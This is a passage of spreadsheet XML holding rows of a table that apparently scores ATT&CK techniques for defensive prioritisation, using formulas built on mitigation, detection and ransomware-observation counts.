        <v>0.3</v>
      </c>
      <c r="B399" s="37">
        <f t="shared" si="6"/>
        <v>278.55736871428576</v>
      </c>
      <c r="C399" s="37" t="s">
        <v>1407</v>
      </c>
      <c r="D399" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E399" s="37" t="s">
        <v>1408</v>
      </c>
      <c r="F399" s="37">
        <v>1</v>
      </c>
      <c r="G399" s="37">
        <v>1</v>
      </c>
      <c r="H399" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I399" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J399" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K399" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L399" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M399" s="37">
        <v>0</v>
      </c>
      <c r="N399" s="56">
        <v>0</v>
      </c>
      <c r="O399" s="56">
        <v>1</v>
      </c>
      <c r="P399" s="56">
        <v>1</v>
      </c>
      <c r="Q399" s="56">
        <v>0</v>
      </c>
      <c r="R399" s="57">
        <v>2.5</v>
      </c>
      <c r="S399" s="57">
        <v>1</v>
      </c>
      <c r="T399" s="57" t="s">
        <v>943</v>
      </c>
      <c r="U399" s="57">
        <v>6</v>
      </c>
      <c r="V399" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190619047619049E-2</v>
      </c>
      <c r="W399" s="37">
        <v>7</v>
      </c>
      <c r="X399" s="37">
        <v>0.127273</v>
      </c>
      <c r="Y399" s="37">
        <v>0.127273</v>
      </c>
      <c r="Z399" s="37">
        <v>2</v>
      </c>
      <c r="AA399" s="37">
        <v>0.02</v>
      </c>
      <c r="AB399" s="37">
        <v>0.02</v>
      </c>
      <c r="AC399" s="37"/>
      <c r="AD399" s="50" t="s">
        <v>1409</v>
      </c>
      <c r="AE399" s="37" t="str" cm="1">
        <f t="array" ref="AE399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD399)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF399" s="37">
        <v>395</v>
      </c>
      <c r="AG399" s="37" t="str" cm="1">
        <f t="array" ref="AG399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH399" s="37">
        <v>395</v>
      </c>
      <c r="AI399" s="37" t="str" cm="1">
        <f t="array" ref="AI399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD399)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ399" s="37">
        <v>395</v>
      </c>
      <c r="AK399" s="37" t="str" cm="1">
        <f t="array" ref="AK399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL399" s="37">
        <v>395</v>
      </c>
      <c r="AM399" s="37" t="str" cm="1">
        <f t="array" ref="AM399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN399" s="37">
        <v>0</v>
      </c>
      <c r="AO399" s="37">
        <v>0</v>
      </c>
      <c r="AP399" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ399" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>92.852456238095257</v>
      </c>
      <c r="AR399" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS399" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT399" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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00" spans="1:47" ht="17">
      <c r="A400" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B400" s="37">
        <f t="shared" si="6"/>
        <v>173.5952380952381</v>
      </c>
      <c r="C400" s="37" t="s">
        <v>1410</v>
      </c>
      <c r="D400" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E400" s="37" t="s">
        <v>1411</v>
      </c>
      <c r="F400" s="37">
        <v>1</v>
      </c>
      <c r="G400" s="37">
        <v>1</v>
      </c>
      <c r="H400" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I400" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J400" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K400" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L400" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M400" s="37">
        <v>0</v>
      </c>
      <c r="N400" s="56">
        <v>0</v>
      </c>
      <c r="O400" s="56">
        <v>1</v>
      </c>
      <c r="P400" s="56">
        <v>1</v>
      </c>
      <c r="Q400" s="56">
        <v>0</v>
      </c>
      <c r="R400" s="57"/>
      <c r="S400" s="57">
        <v>0</v>
      </c>
      <c r="T400" s="57"/>
      <c r="U400" s="57">
        <v>0</v>
      </c>
      <c r="V400" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W400" s="37">
        <v>0</v>
      </c>
      <c r="X400" s="37">
        <v>0</v>
      </c>
      <c r="Y400" s="37">
        <v>0</v>
      </c>
      <c r="Z400" s="37">
        <v>2</v>
      </c>
      <c r="AA400" s="37">
        <v>0.02</v>
      </c>
      <c r="AB400" s="37">
        <v>0.02</v>
      </c>
      <c r="AC400" s="37"/>
      <c r="AD400" s="50" t="s">
        <v>218</v>
      </c>
      <c r="AE400" s="37" t="str" cm="1">
        <f t="array" ref="AE400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF400" s="37">
        <v>396</v>
      </c>
      <c r="AG400" s="37" t="str" cm="1">
        <f t="array" ref="AG400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH400" s="37">
        <v>396</v>
      </c>
      <c r="AI400" s="37" t="str" cm="1">
        <f t="array" ref="AI400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD400)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ400" s="37">
        <v>396</v>
      </c>
      <c r="AK400" s="37" t="str" cm="1">
        <f t="array" ref="AK400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL400" s="37">
        <v>396</v>
      </c>
      <c r="AM400" s="37" t="str" cm="1">
        <f t="array" ref="AM400">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD400)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN400" s="37">
        <v>0</v>
      </c>
      <c r="AO400" s="37">
        <v>2</v>
      </c>
      <c r="AP400" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ400" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>57.865079365079367</v>
      </c>
      <c r="AR400" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS400" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT400" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU40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2.8030990173847314</v>
      </c>
    </row>
    <row r="401" spans="1:47" ht="34">
      <c r="A401" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B401" s="37">
        <f t="shared" si="6"/>
        <v>476.69992433333329</v>
      </c>
      <c r="C401" s="37" t="s">
        <v>1412</v>
      </c>
      <c r="D401" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E401" s="37" t="s">
        <v>1413</v>
      </c>
      <c r="F401" s="37">
        <v>1</v>
      </c>
      <c r="G401" s="37">
        <v>1</v>
      </c>
      <c r="H401" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I401" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J401" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K401" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L401" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M401" s="37">
        <v>0</v>
      </c>
      <c r="N401" s="56">
        <v>1</v>
      </c>
      <c r="O401" s="56">
        <v>5</v>
      </c>
      <c r="P401" s="56">
        <v>2</v>
      </c>
      <c r="Q401" s="56">
        <v>2</v>
      </c>
      <c r="R401" s="57" t="s">
        <v>1414</v>
      </c>
      <c r="S401" s="57">
        <v>6</v>
      </c>
      <c r="T401" s="57" t="s">
        <v>1415</v>
      </c>
      <c r="U401" s="57">
        <v>10</v>
      </c>
      <c r="V401" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999995238095236</v>
      </c>
      <c r="W401" s="37">
        <v>16</v>
      </c>
      <c r="X401" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y401" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z401" s="37">
        <v>10</v>
      </c>
      <c r="AA401" s="37">
        <v>0.1</v>
      </c>
      <c r="AB401" s="37">
        <v>0.1</v>
      </c>
      <c r="AC401" s="37"/>
      <c r="AD401" s="50" t="s">
        <v>1416</v>
      </c>
      <c r="AE401" s="37" t="str" cm="1">
        <f t="array" ref="AE401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD401)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF401" s="37">
        <v>397</v>
      </c>
      <c r="AG401" s="37" t="str" cm="1">
        <f t="array" ref="AG401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH401" s="37">
        <v>397</v>
      </c>
      <c r="AI401" s="37" t="str" cm="1">
        <f t="array" ref="AI401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD401)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ401" s="37">
        <v>397</v>
      </c>
      <c r="AK401" s="37" t="str" cm="1">
        <f t="array" ref="AK401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL401" s="37">
        <v>397</v>
      </c>
      <c r="AM401" s="37" t="str" cm="1">
        <f t="array" ref="AM401">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD401)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN401" s="37">
        <v>0</v>
      </c>
      <c r="AO401" s="37">
        <v>0</v>
      </c>
      <c r="AP401" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ401" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>158.89997477777777</v>
      </c>
      <c r="AR401" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS401" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT401" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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02" spans="1:47" ht="68">
      <c r="A402" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B402" s="37">
        <f t="shared" si="6"/>
        <v>333.77127685714288</v>
      </c>
      <c r="C402" s="37" t="s">
        <v>1417</v>
      </c>
      <c r="D402" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E402" s="37" t="s">
        <v>1418</v>
      </c>
      <c r="F402" s="37">
        <v>1</v>
      </c>
      <c r="G402" s="37">
        <v>1</v>
      </c>
      <c r="H402" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I402" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J402" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K402" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L402" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M402" s="37">
        <v>0</v>
      </c>
      <c r="N402" s="56">
        <v>0</v>
      </c>
      <c r="O402" s="56">
        <v>3</v>
      </c>
      <c r="P402" s="56">
        <v>0</v>
      </c>
      <c r="Q402" s="56">
        <v>0</v>
      </c>
      <c r="R402" s="57" t="s">
        <v>583</v>
      </c>
      <c r="S402" s="57">
        <v>4</v>
      </c>
      <c r="T402" s="57" t="s">
        <v>1419</v>
      </c>
      <c r="U402" s="57">
        <v>6</v>
      </c>
      <c r="V402" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10952371428571428</v>
      </c>
      <c r="W402" s="37">
        <v>10</v>
      </c>
      <c r="X402" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Y402" s="37">
        <v>0.18181800000000001</v>
      </c>
      <c r="Z402" s="37">
        <v>3</v>
      </c>
      <c r="AA402" s="37">
        <v>0.03</v>
      </c>
      <c r="AB402" s="37">
        <v>0.03</v>
      </c>
      <c r="AC402" s="37"/>
      <c r="AD402" s="50" t="s">
        <v>1324</v>
      </c>
      <c r="AE402" s="37" t="str" cm="1">
        <f t="array" ref="AE402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD402)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF402" s="37">
        <v>398</v>
      </c>
      <c r="AG402" s="37" t="str" cm="1">
        <f t="array" ref="AG402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH402" s="37">
        <v>398</v>
      </c>
      <c r="AI402" s="37" t="str" cm="1">
        <f t="array" ref="AI402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD402)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ402" s="37">
        <v>398</v>
      </c>
      <c r="AK402" s="37" t="str" cm="1">
        <f t="array" ref="AK402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL402" s="37">
        <v>398</v>
      </c>
      <c r="AM402" s="37" t="str" cm="1">
        <f t="array" ref="AM402">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD402)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN402" s="37">
        <v>0</v>
      </c>
      <c r="AO402" s="37">
        <v>0</v>
      </c>
      <c r="AP402" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ402" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>111.25709228571429</v>
      </c>
      <c r="AR402" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS402" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT402" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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03" spans="1:47" ht="17">
      <c r="A403" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B403" s="37">
        <f t="shared" si="6"/>
        <v>159.70000000000002</v>
      </c>
      <c r="C403" s="37" t="s">
        <v>1420</v>
      </c>
      <c r="D403" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E403" s="37" t="s">
        <v>1421</v>
      </c>
      <c r="F403" s="37">
        <v>1</v>
      </c>
      <c r="G403" s="37">
        <v>1</v>
      </c>
      <c r="H403" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I403" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J403" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K403" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L403" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M403" s="37">
        <v>0</v>
      </c>
      <c r="N403" s="56">
        <v>0</v>
      </c>
      <c r="O403" s="56">
        <v>0</v>
      </c>
      <c r="P403" s="56">
        <v>0</v>
      </c>
      <c r="Q403" s="56">
        <v>0</v>
      </c>
      <c r="R403" s="57"/>
      <c r="S403" s="57">
        <v>0</v>
      </c>
      <c r="T403" s="57" t="s">
        <v>943</v>
      </c>
      <c r="U403" s="57">
        <v>0</v>
      </c>
      <c r="V403" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W403" s="37">
        <v>0</v>
      </c>
      <c r="X403" s="37">
        <v>0</v>
      </c>
      <c r="Y403" s="37">
        <v>0</v>
      </c>
      <c r="Z403" s="37">
        <v>0</v>
      </c>
      <c r="AA403" s="37">
        <v>0</v>
      </c>
      <c r="AB403" s="37">
        <v>0</v>
      </c>
      <c r="AC403" s="37"/>
      <c r="AD403" s="50" t="s">
        <v>238</v>
      </c>
      <c r="AE403" s="37" t="str" cm="1">
        <f t="array" ref="AE403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF403" s="37">
        <v>399</v>
      </c>
      <c r="AG403" s="37" t="str" cm="1">
        <f t="array" ref="AG403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH403" s="37">
        <v>399</v>
      </c>
      <c r="AI403" s="37" t="str" cm="1">
        <f t="array" ref="AI403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD403)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ403" s="37">
        <v>399</v>
      </c>
      <c r="AK403" s="37" t="str" cm="1">
        <f t="array" ref="AK403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL403" s="37">
        <v>399</v>
      </c>
      <c r="AM403" s="37" t="str" cm="1">
        <f t="array" ref="AM403">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD403)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN403" s="37">
        <v>0</v>
      </c>
      <c r="AO403" s="37"/>
      <c r="AP403" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ403" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>53.233333333333341</v>
      </c>
      <c r="AR403" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS403" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT403" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU40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04" spans="1:47" ht="51">
      <c r="A404" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B404" s="37">
        <f t="shared" si="6"/>
        <v>213.46666666666667</v>
      </c>
      <c r="C404" s="37" t="s">
        <v>1422</v>
      </c>
      <c r="D404" s="50" t="s">
        <v>1403</v>
      </c>
      <c r="E404" s="37" t="s">
        <v>1423</v>
      </c>
      <c r="F404" s="37">
        <v>1</v>
      </c>
      <c r="G404" s="37">
        <v>1</v>
      </c>
      <c r="H404" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I404" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J404" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K404" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L404" s="37">
